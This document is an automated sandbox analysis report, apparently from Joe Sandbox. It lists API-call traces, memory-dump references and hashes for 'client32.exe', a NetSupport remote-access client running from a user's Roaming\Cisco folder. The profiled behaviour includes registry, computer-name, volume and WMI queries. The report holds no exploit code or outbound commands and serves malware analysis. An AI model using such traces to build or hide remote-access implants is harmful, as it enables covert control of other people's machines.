                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,TermUI...), ref: 111393AA
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00007F6E,TermUI...), ref: 111393C3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(75CF0000,?,TermUI...), ref: 1113943B
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 11139453
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeKillLibraryTimer
                                                                                                                                                                                                    • String ID: TermUI
                                                                                                                                                                                                    • API String ID: 2006562601-4085834059
                                                                                                                                                                                                    • Opcode ID: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction ID: bc9711c706b9d41bf1b1aa53e8d725085e588c5fb78ea17b568d689d6d6e9679
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e01743d874b38865cae7b9e648c311240cd0068f3dd68cbc61febb588e4f90f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F03158B16135349BD202DFE9CDC0A7AFBAAABC5B1C711402AF4258720CF770A841CF92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11141A10
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 11141A74
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpen
                                                                                                                                                                                                    • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                                                                                                    • API String ID: 47109696-3245241687
                                                                                                                                                                                                    • Opcode ID: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction ID: a36c5406095c56a7772cd5309942c79e158504ca27ae800c645d53ad84447c87
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63fc0104197c16285f621861676926228ecfc9fc055fc562086e3d717edca7f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A921CD75F0022A5BE710DAA8CD80F9AF7B89B45714F2045AAD95DF3140E731BE458B71
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                      • Part of subcall function 1110E3C0: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 1110E508
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ComputerDirectoryInformationNameSystemVolume
                                                                                                                                                                                                    • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                                                                                                    • API String ID: 1311402438-1858614750
                                                                                                                                                                                                    • Opcode ID: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction ID: 783a1893864e797c111924e05002c86c7d14abf0d26c6a4cafca36759f9e265b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30defc78da8194f59f94e3ff6dc80a811373b5fd913c6199f279900626096282
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E214936E052A616D301CE369D807BFFFBADF86614F054978EC51D7102F626E5048751
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 1101755C
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                                                    • API String ID: 2994556011-578995875
                                                                                                                                                                                                    • Opcode ID: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction ID: 2dfd674cbcced21787933601e0fbf0765c8f89b6bf193c9c24077654eb832309
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb70902765e9df780483309619877a5cdd6fdcad1f0a8482e579a40db52188bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D62129B1E006669BDF11CBA0CC44B6EB7E89F45358F1000B5FC58DA2C8FAB8E940D791
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 11140290: GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                      • Part of subcall function 11140290: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408C5
                                                                                                                                                                                                    • ResetEvent.KERNEL32(00000244), ref: 111408D9
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000244), ref: 111408EF
                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 111408FE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                                                    • String ID: MiniDump
                                                                                                                                                                                                    • API String ID: 1494854734-2840755058
                                                                                                                                                                                                    • Opcode ID: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction ID: 82be7c26d502f028142b998fa5126df4c28d1bc7d262cc6800bde2f36eb64e35
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5093043549d72af129595f684cc28810df42538d39778bc18dae4ac23f44b08
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F311D675E0022667F700DFE9CC81F9AB7689B05B68F214234F624E66C4E761A5418BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000304,000000FF), ref: 11017472
                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                                                                                    • CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InitializeObjectSingleUninitializeWait
                                                                                                                                                                                                    • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                                                                                                                                    • API String ID: 2994556011-2037925671
                                                                                                                                                                                                    • Opcode ID: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction ID: d4ceec51b3d1aeb93fa2206dcf0162908bfa0d380c5fa1549f26343d1b5ce827
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0ded35296c55d0866425beafa263bb65a3590a39d35365136548dea7fc607f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29213575D406655BDB12CBA4CC45BAEBBED9F84358F0000A4EC58DB288EF39D900C761
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1110CA5A
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,1106FB37,?), ref: 1110CA69
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00000000,?,00000000,?), ref: 1110CADC
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: InitializeCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: EnterCriticalSection.KERNEL32(111EC8B8,BBC4A55B,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                      • Part of subcall function 1110C6B0: LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$CurrentInitializeThread
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$p.second
                                                                                                                                                                                                    • API String ID: 2150084884-3525309832
                                                                                                                                                                                                    • Opcode ID: d2f61b0eaed3a002ea92b2e2cc559baee22e6144732f1e003b593fdd17784218
                                                                                                                                                                                                    • Instruction ID: 1b36d3df48c3b94c68758170c6cf325b701265bc9f740d34816683db193cdaff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2f61b0eaed3a002ea92b2e2cc559baee22e6144732f1e003b593fdd17784218
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 172162B6D00619AFC711CF95D885BEFF7B8FB08204F00462AE516A3640EB347505CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11143416
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                                                    • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                                                    • API String ID: 1985783259-2296142801
                                                                                                                                                                                                    • Opcode ID: 49b4075091a4bd02719332453742c8c3b2f1a897a656e3109efce4d1bff81ff6
                                                                                                                                                                                                    • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49b4075091a4bd02719332453742c8c3b2f1a897a656e3109efce4d1bff81ff6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 11031376
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
